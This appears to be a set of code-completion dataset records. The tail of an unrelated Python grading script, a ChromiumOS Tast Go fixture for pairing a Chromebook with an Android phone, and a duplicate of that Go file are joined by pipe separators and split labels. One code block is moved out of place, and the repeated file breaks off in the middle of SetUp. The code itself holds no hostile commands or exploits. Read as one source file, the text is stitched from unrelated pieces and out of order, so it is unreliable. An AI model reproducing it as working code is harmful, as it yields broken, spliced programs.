os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main() | elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) ) | random_line_split |
fixture.go | // Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package crossdevice
import (
"context"
"encoding/json"
"io/ioutil"
"path/filepath"
"strconv"
"strings"
"time"
"chromiumos/tast/common/android/adb"
crossdevicecommon "chromiumos/tast/common/cros/crossdevice"
"chromiumos/tast/common/testexec"
"chromiumos/tast/ctxutil"
"chromiumos/tast/errors"
"chromiumos/tast/local/bluetooth"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/ash"
"chromiumos/tast/local/chrome/crossdevice/crossdevicesettings"
"chromiumos/tast/local/chrome/crossdevice/phonehub"
"chromiumos/tast/local/chrome/lacros/lacrosfixt"
"chromiumos/tast/local/chrome/uiauto"
"chromiumos/tast/local/chrome/uiauto/faillog"
"chromiumos/tast/local/cryptohome"
"chromiumos/tast/local/input"
"chromiumos/tast/local/logsaver"
"chromiumos/tast/testing"
)
// FixtureOptions contains the options that we set for various crossDeviceFixture.
type FixtureOptions struct {
allFeatures bool // Whether or not to enable all cross device features.
saveScreenRecording bool
lockFixture bool // Whether or not to lock the fixture preventing chrome from being torn down outside of fixture teardown.
noSignIn bool // Whether or not to sign in with the specified GAIA account. True will not skip OOBE.
}
// NewCrossDeviceOnboarded creates a fixture that logs in to CrOS, pairs it with an Android device,
// and ensures the features in the "Connected devices" section of OS Settings are ready to use (Smart Lock, Phone Hub, etc.).
// Note that crossdevice fixtures inherit from crossdeviceAndroidSetup.
func NewCrossDeviceOnboarded(opt FixtureOptions, fOpt chrome.OptionsCallback) testing.FixtureImpl {
return &crossdeviceFixture{
fOpt: fOpt,
allFeatures: opt.allFeatures,
saveScreenRecording: opt.saveScreenRecording,
lockFixture: opt.lockFixture,
noSignIn: opt.noSignIn,
}
}
// Fixture runtime variables.
const (
// These vars can be used from the command line when running tests locally to configure the tests to run on personal GAIA accounts.
// Use these vars to log in with your own GAIA credentials on CrOS. The Android device should be signed in with the same account.
customCrOSUsername = "cros_username"
customCrOSPassword = "cros_password"
)
// postTestTimeout is the timeout for the fixture PostTest stage.
// We need a considerable amount of time to collect an Android bug report on failure.
const postTestTimeout = resetTimeout + BugReportDuration
func init() {
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboarded",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLock",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceNoSignIn",
Desc: "User is not signed in (with GAIA) to CrOS but fixture requires control of an Android phone. Does not skip OOBE",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, true}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
SignInProfileTestExtensionManifestKey,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedNoLock",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled. Doesn't lock the fixture before starting the test",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLockLogin",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, false, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
// lacros fixtures
testing.AddFixture(&testing.Fixture{
Name: "lacrosCrossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled with lacros enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return lacrosfixt.NewConfig().Opts()
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
}
type crossdeviceFixture struct {
fOpt chrome.OptionsCallback // Function to generate Chrome Options
cr *chrome.Chrome
tconn *chrome.TestConn
kb *input.KeyboardEventWriter
androidDevice *AndroidDevice
androidAttributes *AndroidAttributes
crosAttributes *crossdevicecommon.CrosAttributes
btsnoopCmd *testexec.Cmd
logMarker *logsaver.Marker // Marker for per-test log.
allFeatures bool
saveAndroidScreenRecordingOnError func(context.Context, func() bool) error
saveScreenRecording bool
lockFixture bool
noSignIn bool
logcatStartTime adb.LogcatTimestamp
downloadsPath string
}
// FixtData holds information made available to tests that specify this Fixture.
type FixtData struct {
// Chrome is the running chrome instance.
Chrome *chrome.Chrome
// TestConn is a connection to the test extension.
TestConn *chrome.TestConn
// Connection to the lock screen test extension.
LoginConn *chrome.TestConn
// AndroidDevice is an object for interacting with the connected Android device's Multidevice Snippet.
AndroidDevice *AndroidDevice
// The credentials to be used on both chromebook and phone.
Username string
Password string
// The options used to start Chrome sessions.
ChromeOptions []chrome.Option
}
func (f *crossdeviceFixture) SetUp(ctx context.Context, s *testing.FixtState) interface{} {
// Android device from parent fixture.
androidDevice := s.ParentValue().(*FixtData).AndroidDevice
f.androidDevice = androidDevice
// Credentials to use (same as Android).
crosUsername := s.ParentValue().(*FixtData).Username
crosPassword := s.ParentValue().(*FixtData).Password
// Allocate time for logging and saving a screenshot and bugreport in case of failure.
cleanupCtx := ctx
ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second+BugReportDuration)
defer cancel()
// Save logcat so we have Android logs even if fixture setup fails.
startTime, err := androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
defer androidDevice.Device.DumpLogcatFromTimestamp(cleanupCtx, filepath.Join(s.OutDir(), "fixture_setup_logcat.txt"), startTime)
defer androidDevice.DumpLogs(cleanupCtx, s.OutDir(), "fixture_setup_persistent_logcat.txt")
// Set default chrome options.
opts, err := f.fOpt(ctx, s)
if err != nil {
s.Fatal("Failed to obtain Chrome options: ", err)
}
tags := []string{
"*nearby*=3",
"*cryptauth*=3",
"*device_sync*=3",
"*multidevice*=3",
"*secure_channel*=3",
"*phonehub*=3",
"*blue*=3",
"ble_*=3",
}
opts = append(opts, chrome.ExtraArgs("--enable-logging", "--vmodule="+strings.Join(tags, ",")))
opts = append(opts, chrome.EnableFeatures("PhoneHubCameraRoll", "SmartLockUIRevamp", "OobeQuickStart"))
customUser, userOk := s.Var(customCrOSUsername)
customPass, passOk := s.Var(customCrOSPassword)
if userOk && passOk {
s.Log("Logging in with user-provided credentials")
crosUsername = customUser
crosPassword = customPass
} else {
s.Log("Logging in with default GAIA credentials")
}
if f.noSignIn {
opts = append(opts, chrome.DontSkipOOBEAfterLogin())
} else {
opts = append(opts, chrome.GAIALogin(chrome.Creds{User: crosUsername, Pass: crosPassword}))
}
if val, ok := s.Var(KeepStateVar); ok {
b, err := strconv.ParseBool(val)
if err != nil {
s.Fatalf("Unable to convert %v var to bool: %v", KeepStateVar, err)
}
if b {
opts = append(opts, chrome.KeepState())
}
}
cr, err := chrome.New(
ctx,
opts...,
)
if err != nil {
s.Fatal("Failed to start Chrome: ", err)
}
f.cr = cr
tconn, err := cr.TestAPIConn(ctx)
if err != nil {
s.Fatal("Creating test API connection failed: ", err)
}
f.tconn = tconn
defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
// Capture a bug report on the Android phone if any onboarding/setup fails.
defer func() {
if s.HasError() {
if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
s.Log("Failed to save Android bug report: ", err)
}
}
}()
// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
if err := btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
defer btsnoopCmd.Wait()
defer btsnoopCmd.Kill()
// Enable bluetooth debug logging.
levels := bluetooth.LogVerbosity{
Bluez: true,
Kernel: true,
}
if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
return errors.Wrap(err, "failed to enable bluetooth debug logging")
}
// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
if !f.noSignIn {
// Sometimes during login the tcp connection to the snippet server on Android is lost.
// If the Pair RPC fails, reconnect to the snippet server and try again.
if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
s.Fatal("Pairing with Android failed: ", err)
}
if f.allFeatures {
// Wait for the "Smart Lock is turned on" notification to appear,
// since it will cause Phone Hub to close if it's open before the notification pops up.
if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
}
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
if f.lockFixture {
chrome.Unlock()
if err := f.cr.Close(ctx); err != nil {
s.Log("Failed to close Chrome connection: ", err)
}
}
f.cr = nil
}
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
if err := f.cr.Responded(ctx); err != nil {
return errors.Wrap(err, "existing Chrome connection is unusable")
}
if err := f.cr.ResetState(ctx); err != nil {
return errors.Wrap(err, "failed resetting existing Chrome session")
}
return nil
}
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
s.Error("Failed to save device attributes: ", err)
}
f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
if err := f.btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
if f.logMarker != nil {
s.Log("A log marker is already created but not cleaned up")
}
logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
if err == nil {
f.logMarker = logMarker
} else {
s.Log("Failed to start the log saver: ", err)
}
timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
f.logcatStartTime = timestamp
if f.saveScreenRecording {
if f.kb == nil {
// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
kb, err := input.VirtualKeyboard(ctx)
if err != nil {
s.Fatal("Failed to setup keyboard for screen recording: ", err)
}
f.kb = kb
}
if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
s.Fatal("Failed to start screen recording on CrOS: ", err)
}
saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
if err != nil {
s.Fatal("Failed to start screen recording on Android: ", err)
}
f.saveAndroidScreenRecordingOnError = saveScreen
}
}
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
if err := f.btsnoopCmd.Kill(); err != nil {
s.Error("Failed to stop btsnoop log capture: ", err)
}
f.btsnoopCmd.Wait()
f.btsnoopCmd = nil
if f.logMarker != nil {
if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
s.Log("Failed to store per-test log data: ", err)
}
f.logMarker = nil
}
// Restore connection to the ADB-over-WiFi device if it was lost during the test.
// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
s.Log("Connection to ADB device lost, restaring")
device, err := AdbOverWifi(ctx)
if err != nil {
s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
}
f.androidDevice.Device = device
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
s.Fatal("Failed to reconnect to the snippet: ", err)
}
}
if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
s.Fatal("Failed to save logcat logs from the test: ", err)
}
if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
s.Fatal("Failed to save persistent logcat logs: ", err)
}
if f.saveScreenRecording {
if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
s.Fatal("Failed to save Android screen recording: ", err)
}
f.saveAndroidScreenRecordingOnError = nil
ui := uiauto.New(f.tconn)
var crosRecordErr error
if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil | else {
crosRecordErr = uiauto.StopRecordFromKBAndSaveOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
}
if crosRecordErr != nil {
s.Fatal("Failed to save CrOS screen recording: ", crosRecordErr)
}
}
if s.HasError() {
if err := BugReport(ctx, f.androidDevice.Device, s.OutDir()); err != nil {
s.Error("Failed to save Android bug report: ", err)
}
}
}
// Verify that pairing between Android and Chromebook is successful.
func (f *crossdeviceFixture) PairWithAndroid(ctx context.Context, tconn *chrome.TestConn, cr *chrome.Chrome) error {
if err := f.androidDevice.Pair(ctx); err != nil {
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
return errors.Wrap(err, "failed to reconnect to the snippet server")
}
if err := f.androidDevice.Pair(ctx); err != nil {
return errors.Wrap(err, "failed to connect the Android device to CrOS")
}
}
if err := crossdevicesettings.WaitForConnectedDevice(ctx, tconn, cr); err != nil {
return errors.Wrap(err, "failed waiting for the connected device to appear in OS settings")
}
return nil
}
// saveDeviceAttributes saves the CrOS and Android device attributes as a formatted JSON at the specified filepath.
func saveDeviceAttributes(crosAttrs *crossdevicecommon.CrosAttributes, androidAttrs *AndroidAttributes, filepath string) error {
attributes := struct {
CrOS *crossdevicecommon.CrosAttributes
Android *AndroidAttributes
}{CrOS: crosAttrs, Android: androidAttrs}
crosLog, err := json.MarshalIndent(attributes, "", "\t")
if err != nil {
return errors.Wrap(err, "failed to format device metadata for logging")
}
if err := ioutil.WriteFile(filepath, crosLog, 0644); err != nil {
return errors.Wrap(err, "failed to write CrOS attributes to output file")
}
return nil
}
// ConnectToWifi connects the chromebook to the Wifi network in its RF box.
func ConnectToWifi(ctx context.Context) error {
if err := testing.Poll(ctx, func(ctx context.Context) error {
out, err := testexec.CommandContext(ctx, "/usr/local/autotest/cros/scripts/wifi", "connect", "nearbysharing_1", "password").CombinedOutput(testexec.DumpLogOnError)
if err != nil {
if strings.Contains(string(out), "already connected") {
testing.ContextLog(ctx, "Already connected to wifi network")
return nil
}
return errors.Wrap(err, "failed to connect CrOS device to Wifi")
}
return nil
}, &testing.PollOptions{Timeout: 20 * time.Second, Interval: 3 * time.Second}); err != nil {
return errors.Wrap(err, "failed to connect to wifi")
}
return nil
}
| {
// Smart Lock tests automatically stop the screen recording when they lock the screen.
// The screen recording should still exist though.
crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
} | conditional_block |
fixture.go | // Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package crossdevice
import (
"context"
"encoding/json"
"io/ioutil"
"path/filepath"
"strconv"
"strings"
"time"
"chromiumos/tast/common/android/adb"
crossdevicecommon "chromiumos/tast/common/cros/crossdevice"
"chromiumos/tast/common/testexec"
"chromiumos/tast/ctxutil"
"chromiumos/tast/errors"
"chromiumos/tast/local/bluetooth"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/ash"
"chromiumos/tast/local/chrome/crossdevice/crossdevicesettings"
"chromiumos/tast/local/chrome/crossdevice/phonehub"
"chromiumos/tast/local/chrome/lacros/lacrosfixt"
"chromiumos/tast/local/chrome/uiauto"
"chromiumos/tast/local/chrome/uiauto/faillog"
"chromiumos/tast/local/cryptohome"
"chromiumos/tast/local/input"
"chromiumos/tast/local/logsaver"
"chromiumos/tast/testing"
)
// FixtureOptions contains the options that we set for various crossDeviceFixture.
type FixtureOptions struct {
allFeatures bool // Whether or not to enable all cross device features.
saveScreenRecording bool
lockFixture bool // Whether or not to lock the fixture preventing chrome from being torn down outside of fixture teardown.
noSignIn bool // Whether or not to sign in with the specified GAIA account. True will not skip OOBE.
}
// NewCrossDeviceOnboarded creates a fixture that logs in to CrOS, pairs it with an Android device,
// and ensures the features in the "Connected devices" section of OS Settings are ready to use (Smart Lock, Phone Hub, etc.).
// Note that crossdevice fixtures inherit from crossdeviceAndroidSetup.
func NewCrossDeviceOnboarded(opt FixtureOptions, fOpt chrome.OptionsCallback) testing.FixtureImpl {
return &crossdeviceFixture{
fOpt: fOpt,
allFeatures: opt.allFeatures,
saveScreenRecording: opt.saveScreenRecording,
lockFixture: opt.lockFixture,
noSignIn: opt.noSignIn,
}
}
// Fixture runtime variables.
const (
// These vars can be used from the command line when running tests locally to configure the tests to run on personal GAIA accounts.
// Use these vars to log in with your own GAIA credentials on CrOS. The Android device should be signed in with the same account.
customCrOSUsername = "cros_username"
customCrOSPassword = "cros_password"
)
// postTestTimeout is the timeout for the fixture PostTest stage.
// We need a considerable amount of time to collect an Android bug report on failure.
const postTestTimeout = resetTimeout + BugReportDuration
func init() {
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboarded",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLock",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceNoSignIn",
Desc: "User is not signed in (with GAIA) to CrOS but fixture requires control of an Android phone. Does not skip OOBE",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, true}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
SignInProfileTestExtensionManifestKey,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedNoLock",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled. Doesn't lock the fixture before starting the test",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLockLogin",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, false, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
// lacros fixtures
testing.AddFixture(&testing.Fixture{
Name: "lacrosCrossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled with lacros enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return lacrosfixt.NewConfig().Opts()
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
}
// crossdeviceFixture implements the Cross Device fixtures: it owns the Chrome
// session, the connection to the paired Android phone, and the per-test
// logging/recording handles shared by SetUp/PreTest/PostTest/TearDown.
type crossdeviceFixture struct {
	fOpt              chrome.OptionsCallback // Function to generate Chrome Options
	cr                *chrome.Chrome         // Chrome session started in SetUp.
	tconn             *chrome.TestConn       // Test API connection for the session.
	kb                *input.KeyboardEventWriter // Virtual keyboard, lazily created for screen recording.
	androidDevice     *AndroidDevice         // Paired phone, inherited from the parent fixture.
	androidAttributes *AndroidAttributes     // Android metadata captured for reporting.
	crosAttributes    *crossdevicecommon.CrosAttributes // CrOS metadata captured for reporting.
	btsnoopCmd        *testexec.Cmd          // Per-test bluetooth snoop capture process.
	logMarker         *logsaver.Marker       // Marker for per-test log.
	allFeatures       bool                   // Enable all Cross Device features (Phone Hub etc.) during setup.
	saveAndroidScreenRecordingOnError func(context.Context, func() bool) error // Saver returned by StartScreenRecording; set in PreTest.
	saveScreenRecording bool                 // Record CrOS and Android screens for each test.
	lockFixture       bool                   // Call chrome.Lock() after setup so tests can't restart Chrome.
	noSignIn          bool                   // Skip GAIA sign-in and stay in OOBE.
	logcatStartTime   adb.LogcatTimestamp    // Logcat position at PreTest, used to slice per-test logs.
	downloadsPath     string                 // User's Downloads dir, destination for screen recordings.
}
// FixtData holds information made available to tests that specify this Fixture.
type FixtData struct {
	// Chrome is the running chrome instance.
	Chrome *chrome.Chrome
	// TestConn is a connection to the test extension.
	TestConn *chrome.TestConn
	// LoginConn is a connection to the lock screen test extension.
	LoginConn *chrome.TestConn
	// AndroidDevice is an object for interacting with the connected Android device's Multidevice Snippet.
	AndroidDevice *AndroidDevice
	// Username is the username used on both the chromebook and phone.
	Username string
	// Password is the password used on both the chromebook and phone.
	Password string
	// ChromeOptions are the options used to start Chrome sessions, so tests can restart Chrome identically.
	ChromeOptions []chrome.Option
}
// SetUp starts Chrome (optionally with GAIA sign-in), pairs the Chromebook
// with the Android phone provided by the parent fixture, and enables the
// requested Cross Device features. It returns a *FixtData carrying the Chrome
// session, test API connection, Android device handle, credentials, and the
// Chrome options used, so dependent tests/fixtures can reuse them.
func (f *crossdeviceFixture) SetUp(ctx context.Context, s *testing.FixtState) interface{} {
	// Android device from parent fixture.
	androidDevice := s.ParentValue().(*FixtData).AndroidDevice
	f.androidDevice = androidDevice
	// Credentials to use (same as Android).
	crosUsername := s.ParentValue().(*FixtData).Username
	crosPassword := s.ParentValue().(*FixtData).Password
	// Allocate time for logging and saving a screenshot and bugreport in case of failure.
	cleanupCtx := ctx
	ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second+BugReportDuration)
	defer cancel()
	// Save logcat so we have Android logs even if fixture setup fails.
	startTime, err := androidDevice.Device.LatestLogcatTimestamp(ctx)
	if err != nil {
		s.Fatal("Failed to get latest logcat timestamp: ", err)
	}
	defer androidDevice.Device.DumpLogcatFromTimestamp(cleanupCtx, filepath.Join(s.OutDir(), "fixture_setup_logcat.txt"), startTime)
	defer androidDevice.DumpLogs(cleanupCtx, s.OutDir(), "fixture_setup_persistent_logcat.txt")
	// Set default chrome options.
	opts, err := f.fOpt(ctx, s)
	if err != nil {
		s.Fatal("Failed to obtain Chrome options: ", err)
	}
	// Verbose-log the Chrome modules relevant to Cross Device debugging
	// (Nearby, CryptAuth, MultiDevice, Secure Channel, Phone Hub, bluetooth).
	tags := []string{
		"*nearby*=3",
		"*cryptauth*=3",
		"*device_sync*=3",
		"*multidevice*=3",
		"*secure_channel*=3",
		"*phonehub*=3",
		"*blue*=3",
		"ble_*=3",
	}
	opts = append(opts, chrome.ExtraArgs("--enable-logging", "--vmodule="+strings.Join(tags, ",")))
	opts = append(opts, chrome.EnableFeatures("PhoneHubCameraRoll", "SmartLockUIRevamp", "OobeQuickStart"))
	// Runtime vars may override the credentials inherited from the parent fixture.
	customUser, userOk := s.Var(customCrOSUsername)
	customPass, passOk := s.Var(customCrOSPassword)
	if userOk && passOk {
		s.Log("Logging in with user-provided credentials")
		crosUsername = customUser
		crosPassword = customPass
	} else {
		s.Log("Logging in with default GAIA credentials")
	}
	if f.noSignIn {
		opts = append(opts, chrome.DontSkipOOBEAfterLogin())
	} else {
		opts = append(opts, chrome.GAIALogin(chrome.Creds{User: crosUsername, Pass: crosPassword}))
	}
	if val, ok := s.Var(KeepStateVar); ok {
		b, err := strconv.ParseBool(val)
		if err != nil {
			s.Fatalf("Unable to convert %v var to bool: %v", KeepStateVar, err)
		}
		if b {
			opts = append(opts, chrome.KeepState())
		}
	}
	cr, err := chrome.New(
		ctx,
		opts...,
	)
	if err != nil {
		s.Fatal("Failed to start Chrome: ", err)
	}
	f.cr = cr
	tconn, err := cr.TestAPIConn(ctx)
	if err != nil {
		s.Fatal("Creating test API connection failed: ", err)
	}
	f.tconn = tconn
	defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
	// Capture a bug report on the Android phone if any onboarding/setup fails.
	defer func() {
